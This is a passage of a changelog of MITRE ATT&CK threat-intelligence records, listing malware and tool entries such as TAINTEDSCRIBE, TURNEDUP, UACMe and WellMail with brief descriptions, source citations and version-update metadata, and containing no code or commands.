"created": "2021-03-05 15:56:44.479000+00:00", + "modified": "2025-04-25 14:43:52.174000+00:00", + "name": "TAINTEDSCRIBE", + "description": "[TAINTEDSCRIBE](https://attack.mitre.org/software/S0586) is a fully-featured beaconing implant integrated with command modules used by [Lazarus Group](https://attack.mitre.org/groups/G0032). It was first reported in May 2020.(Citation: CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0586", + "external_id": "S0586" + }, + { + "source_name": "CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020", + "description": "USG. (2020, May 12). MAR-10288834-2.v1 \u2013 North Korean Trojan: TAINTEDSCRIBE. Retrieved March 5, 2021.", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-133b" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "TAINTEDSCRIBE" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Daniyal Naeem, BT Security" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:52.174000+00:00\", \"old_value\": \"2025-04-16 20:38:19.869000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--0b32ec39-ba61-4864-9ebe-b4b0b73caf9a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:42:39.777000+00:00", + "name": "TDTESS", + "description": "[TDTESS](https://attack.mitre.org/software/S0164) is a 64-bit 
.NET binary backdoor used by [CopyKittens](https://attack.mitre.org/groups/G0052). (Citation: ClearSky Wilted Tulip July 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0164", + "external_id": "S0164" + }, + { + "source_name": "TDTESS", + "description": "(Citation: ClearSky Wilted Tulip July 2017)" + }, + { + "source_name": "ClearSky Wilted Tulip July 2017", + "description": "ClearSky Cyber Security and Trend Micro. (2017, July). Operation Wilted Tulip: Exposing a cyber espionage apparatus. Retrieved August 21, 2017.", + "url": "http://www.clearskysec.com/wp-content/uploads/2017/07/Operation_Wilted_Tulip.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "TDTESS" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:42:39.777000+00:00\", \"old_value\": \"2025-04-16 20:37:55.276000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--db1355a7-e5c9-4e2c-8da7-eccf2ae9bf5c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:44:50.321000+00:00", + "name": "TURNEDUP", + "description": "[TURNEDUP](https://attack.mitre.org/software/S0199) is a non-public backdoor. It has been dropped by [APT33](https://attack.mitre.org/groups/G0064)'s [StoneDrill](https://attack.mitre.org/software/S0380) malware. 
(Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0199", + "external_id": "S0199" + }, + { + "source_name": "TURNEDUP", + "description": "(Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)" + }, + { + "source_name": "FireEye APT33 Sept 2017", + "description": "O'Leary, J., et al. (2017, September 20). Insights into Iranian Cyber Espionage: APT33 Targets Aerospace and Energy Sectors and has Ties to Destructive Malware. Retrieved February 15, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + }, + { + "source_name": "FireEye APT33 Webinar Sept 2017", + "description": "Davis, S. and Carr, N. (2017, September 21). APT33: New Insights into Iranian Cyber Espionage Group. Retrieved February 15, 2018.", + "url": "https://www.brighttalk.com/webcast/10703/275683" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "TURNEDUP" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Christiaan Beek, @ChristiaanBeek", + "Ryan Becwar" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:50.321000+00:00\", \"old_value\": \"2025-04-16 20:38:38.086000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--b51797f7-57da-4210-b8ac-b8632ee75d70", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": 
"2020-06-08 14:57:32.842000+00:00", + "modified": "2025-04-25 14:44:28.616000+00:00", + "name": "TajMahal", + "description": "[TajMahal](https://attack.mitre.org/software/S0467) is a multifunctional spying framework that has been in use since at least 2014. [TajMahal](https://attack.mitre.org/software/S0467) is comprised of two separate packages, named Tokyo and Yokohama, and can deploy up to 80 plugins.(Citation: Kaspersky TajMahal April 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0467", + "external_id": "S0467" + }, + { + "source_name": "Kaspersky TajMahal April 2019", + "description": "GReAT. (2019, April 10). Project TajMahal \u2013 a sophisticated new APT framework. Retrieved October 14, 2019.", + "url": "https://securelist.com/project-tajmahal/90240/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "TajMahal" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:28.616000+00:00\", \"old_value\": \"2025-04-16 20:38:31.332000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--c5e9cb46-aced-466c-85ea-7db5572ad9ec", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:32:11.148000+00:00", + "modified": "2025-04-25 14:44:38.888000+00:00", + "name": "Trojan.Mebromi", + "description": "[Trojan.Mebromi](https://attack.mitre.org/software/S0001) is BIOS-level malware that takes control of the victim before 
MBR. (Citation: Ge 2011)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0001", + "external_id": "S0001" + }, + { + "source_name": "Ge 2011", + "description": "Ge, L. (2011, September 9). BIOS Threat is Showing up Again!. Retrieved November 14, 2014.", + "url": "http://www.symantec.com/connect/blogs/bios-threat-showing-again" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Trojan.Mebromi" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:38.888000+00:00\", \"old_value\": \"2025-04-16 20:38:34.746000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--691c60e2-273d-4d56-9ce6-b67e0f8719ad", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-01-16 16:13:52.465000+00:00", + "modified": "2025-04-25 14:43:39.011000+00:00", + "name": "Truvasys", + "description": "[Truvasys](https://attack.mitre.org/software/S0178) is first-stage malware that has been used by [PROMETHIUM](https://attack.mitre.org/groups/G0056). It is a collection of modules written in the Delphi programming language. 
(Citation: Microsoft Win Defender Truvasys Sep 2017) (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0178", + "external_id": "S0178" + }, + { + "source_name": "Truvasys", + "description": "(Citation: Microsoft Win Defender Truvasys Sep 2017) (Citation: Microsoft NEODYMIUM Dec 2016) (Citation: Microsoft SIR Vol 21)" + }, + { + "source_name": "Microsoft Win Defender Truvasys Sep 2017", + "description": "Microsoft. (2017, September 15). Backdoor:Win32/Truvasys.A!dha. Retrieved November 30, 2017.", + "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Backdoor:Win32/Truvasys.A!dha" + }, + { + "source_name": "Microsoft NEODYMIUM Dec 2016", + "description": "Microsoft. (2016, December 14). Twin zero-day attacks: PROMETHIUM and NEODYMIUM target individuals in Europe. Retrieved November 27, 2017.", + "url": "https://blogs.technet.microsoft.com/mmpc/2016/12/14/twin-zero-day-attacks-promethium-and-neodymium-target-individuals-in-europe/" + }, + { + "source_name": "Microsoft SIR Vol 21", + "description": "Anthe, C. et al. (2016, December 14). Microsoft Security Intelligence Report Volume 21. 
Retrieved November 27, 2017.", + "url": "http://download.microsoft.com/download/E/B/0/EB0F50CC-989C-4B66-B7F6-68CD3DC90DE3/Microsoft_Security_Intelligence_Report_Volume_21_English.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Truvasys" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:39.011000+00:00\", \"old_value\": \"2025-04-16 20:38:14.507000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--350f12cf-fd3b-4dad-b323-14b943090df4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-09-21 15:21:31.795000+00:00", + "modified": "2025-04-25 14:43:01.037000+00:00", + "name": "Turian", + "description": "[Turian](https://attack.mitre.org/software/S0647) is a backdoor that has been used by [BackdoorDiplomacy](https://attack.mitre.org/groups/G0135) to target Ministries of Foreign Affairs, telecommunication companies, and charities in Africa, Europe, the Middle East, and Asia. First reported in 2021, [Turian](https://attack.mitre.org/software/S0647) is likely related to Quarian, an older backdoor that was last observed being used in 2013 against diplomatic targets in Syria and the United States.(Citation: ESET BackdoorDiplomacy Jun 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0647", + "external_id": "S0647" + }, + { + "source_name": "ESET BackdoorDiplomacy Jun 2021", + "description": "Adam Burgher. 
(2021, June 10). BackdoorDiplomacy: Upgrading from Quarian to Turian. Retrieved September 1, 2021", + "url": "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Turian" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Zaw Min Htun, @Z3TAE" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:01.037000+00:00\", \"old_value\": \"2025-04-16 20:38:02.104000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "tool", + "id": "tool--102c3898-85e0-43ee-ae28-62a0a3ed9507", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:09.047000+00:00", + "modified": "2025-04-25 14:45:13.232000+00:00", + "name": "UACMe", + "description": "[UACMe](https://attack.mitre.org/software/S0116) is an open source assessment tool that contains many methods for bypassing Windows User Account Control on multiple versions of the operating system. (Citation: Github UACMe)", + "revoked": false, + "labels": [ + "tool" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0116", + "external_id": "S0116" + }, + { + "source_name": "Github UACMe", + "description": "UACME Project. (2016, June 16). UACMe. 
Retrieved July 26, 2016.", + "url": "https://github.com/hfiref0x/UACME" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:13.232000+00:00\", \"old_value\": \"2025-04-16 20:38:49.934000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--fb4e3792-e915-4fdd-a9cd-92dfa2ace7aa", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:45:09.125000+00:00", + "name": "UPPERCUT", + "description": "[UPPERCUT](https://attack.mitre.org/software/S0275) is a backdoor that has been used by [menuPass](https://attack.mitre.org/groups/G0045). (Citation: FireEye APT10 Sept 2018)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0275", + "external_id": "S0275" + }, + { + "source_name": "UPPERCUT", + "description": "(Citation: FireEye APT10 Sept 2018)" + }, + { + "source_name": "ANEL", + "description": "(Citation: FireEye APT10 Sept 2018)" + }, + { + "source_name": "FireEye APT10 Sept 2018", + "description": "Matsuda, A., Muhammad I. (2018, September 13). APT10 Targeting Japanese Corporations Using Updated TTPs. 
Retrieved September 17, 2018.", + "url": "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "UPPERCUT", + "ANEL" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:45:09.125000+00:00\", \"old_value\": \"2025-04-16 20:38:44.933000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--75bba379-4ba1-467e-8c60-ec2b269ee984", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-20 19:54:06.476000+00:00", + "modified": "2025-04-25 14:43:47.313000+00:00", + "name": "USBferry", + "description": "[USBferry](https://attack.mitre.org/software/S0452) is an information stealing malware and has been used by [Tropic Trooper](https://attack.mitre.org/groups/G0081) in targeted attacks against Taiwanese and Philippine air-gapped military environments. [USBferry](https://attack.mitre.org/software/S0452) shares an overlapping codebase with [YAHOYAH](https://attack.mitre.org/software/S0388), though it has several features which makes it a distinct piece of malware.(Citation: TrendMicro Tropic Trooper May 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0452", + "external_id": "S0452" + }, + { + "source_name": "TrendMicro Tropic Trooper May 2020", + "description": "Chen, J.. (2020, May 12). 
Tropic Trooper\u2019s Back: USBferry Attack Targets Air gapped Environments. Retrieved May 20, 2020.", + "url": "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "USBferry" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:47.313000+00:00\", \"old_value\": \"2025-04-16 20:38:17.950000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--3d8e547d-9456-4f32-a895-dc86134e282f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-04-18 17:59:24.739000+00:00", + "modified": "2025-04-25 14:43:05.057000+00:00", + "name": "Umbreon", + "description": "A Linux rootkit that provides backdoor access and hides from defenders.", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0221", + "external_id": "S0221" + }, + { + "source_name": "Umbreon", + "description": "(Citation: Umbreon Trend Micro)" + }, + { + "source_name": "Umbreon Trend Micro", + "description": "Fernando Merc\u00eas. (2016, September 5). Pok\u00e9mon-themed Umbreon Linux Rootkit Hits x86, ARM Systems. 
Retrieved March 5, 2018.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/?_ga=2.180041126.367598458.1505420282-1759340220.1502477046" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Umbreon" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:05.057000+00:00\", \"old_value\": \"2025-04-16 20:38:03.511000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--ab3580c8-8435-4117-aace-3d9fbe46aa56", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:33:15.020000+00:00", + "modified": "2025-04-25 14:44:22.301000+00:00", + "name": "Unknown Logger", + "description": "[Unknown Logger](https://attack.mitre.org/software/S0130) is a publicly released, free backdoor. Version 1.5 of the backdoor has been used by the actors responsible for the MONSOON campaign. (Citation: Forcepoint Monsoon)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0130", + "external_id": "S0130" + }, + { + "source_name": "Forcepoint Monsoon", + "description": "Settle, A., et al. (2016, August 8). MONSOON - Analysis Of An APT Campaign. 
Retrieved September 22, 2016.", + "url": "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Unknown Logger" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:22.301000+00:00\", \"old_value\": \"2025-04-16 20:38:29.897000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--8caa18af-4758-4fd3-9600-e8af579e89ed", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-05-08 20:43:25.743000+00:00", + "modified": "2025-04-25 14:43:59.751000+00:00", + "name": "VBShower", + "description": "[VBShower](https://attack.mitre.org/software/S0442) is a backdoor that has been used by [Inception](https://attack.mitre.org/groups/G0100) since at least 2019. [VBShower](https://attack.mitre.org/software/S0442) has been used as a downloader for second stage payloads, including [PowerShower](https://attack.mitre.org/software/S0441).(Citation: Kaspersky Cloud Atlas August 2019)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0442", + "external_id": "S0442" + }, + { + "source_name": "Kaspersky Cloud Atlas August 2019", + "description": "GReAT. (2019, August 12). Recent Cloud Atlas activity. 
Retrieved May 8, 2020.", + "url": "https://securelist.com/recent-cloud-atlas-activity/92016/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "VBShower" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:43:59.751000+00:00\", \"old_value\": \"2025-04-16 20:38:21.823000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--96eca9b9-b37f-42f1-96dc-a2c441403194", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-08-04 15:02:56.965000+00:00", + "modified": "2025-04-25 14:44:08.033000+00:00", + "name": "VaporRage", + "description": "[VaporRage](https://attack.mitre.org/software/S0636) is a shellcode downloader that has been used by [APT29](https://attack.mitre.org/groups/G0016) since at least 2021.(Citation: MSTIC Nobelium Toolset May 2021)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0636", + "external_id": "S0636" + }, + { + "source_name": "MSTIC Nobelium Toolset May 2021", + "description": "MSTIC. (2021, May 28). Breaking down NOBELIUM\u2019s latest early-stage toolset. 
Retrieved August 4, 2021.", + "url": "https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "VaporRage" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:08.033000+00:00\", \"old_value\": \"2025-04-16 20:38:24.732000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-12-14 16:46:06.044000+00:00", + "modified": "2025-04-25 14:44:09.479000+00:00", + "name": "WINDSHIELD", + "description": "[WINDSHIELD](https://attack.mitre.org/software/S0155) is a signature backdoor used by [APT32](https://attack.mitre.org/groups/G0050). (Citation: FireEye APT32 May 2017)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0155", + "external_id": "S0155" + }, + { + "source_name": "FireEye APT32 May 2017", + "description": "Carr, N.. (2017, May 14). Cyber Espionage is Alive and Well: APT32 and the Threat to Global Corporations. 
Retrieved June 18, 2017.", + "url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:09.479000+00:00\", \"old_value\": \"2025-04-16 20:38:25.359000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--959f3b19-2dc8-48d5-8942-c66813a5101a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-29 17:48:27.517000+00:00", + "modified": "2025-04-25 14:44:06.771000+00:00", + "name": "WellMail", + "description": "[WellMail](https://attack.mitre.org/software/S0515) is a lightweight malware written in Golang used by [APT29](https://attack.mitre.org/groups/G0016), similar in design and structure to [WellMess](https://attack.mitre.org/software/S0514).(Citation: CISA WellMail July 2020)(Citation: NCSC APT29 July 2020)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0515", + "external_id": "S0515" + }, + { + "source_name": "CISA WellMail July 2020", + "description": "CISA. (2020, July 16). MAR-10296782-3.v1 \u2013 WELLMAIL. Retrieved September 29, 2020.", + "url": "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198c" + }, + { + "source_name": "NCSC APT29 July 2020", + "description": "National Cyber Security Centre. (2020, July 16). Advisory: APT29 targets COVID-19 vaccine development. 
Retrieved September 29, 2020.", + "url": "https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "WellMail" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Josh Campbell, Cyborg Security, @cyb0rgsecur1ty" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:44:06.771000+00:00\", \"old_value\": \"2025-04-16 20:38:24.228000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--3a4197ae-ec63-4162-907b-9a073d1157e4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-24 19:39:44.392000+00:00", + "modified": "2025-04-25 14:43:03.067000+00:00", + "name": "WellMess", + "description": "[WellMess](https://attack.mitre.org/software/S0514) is lightweight malware family with variants written in .NET and Golang that has 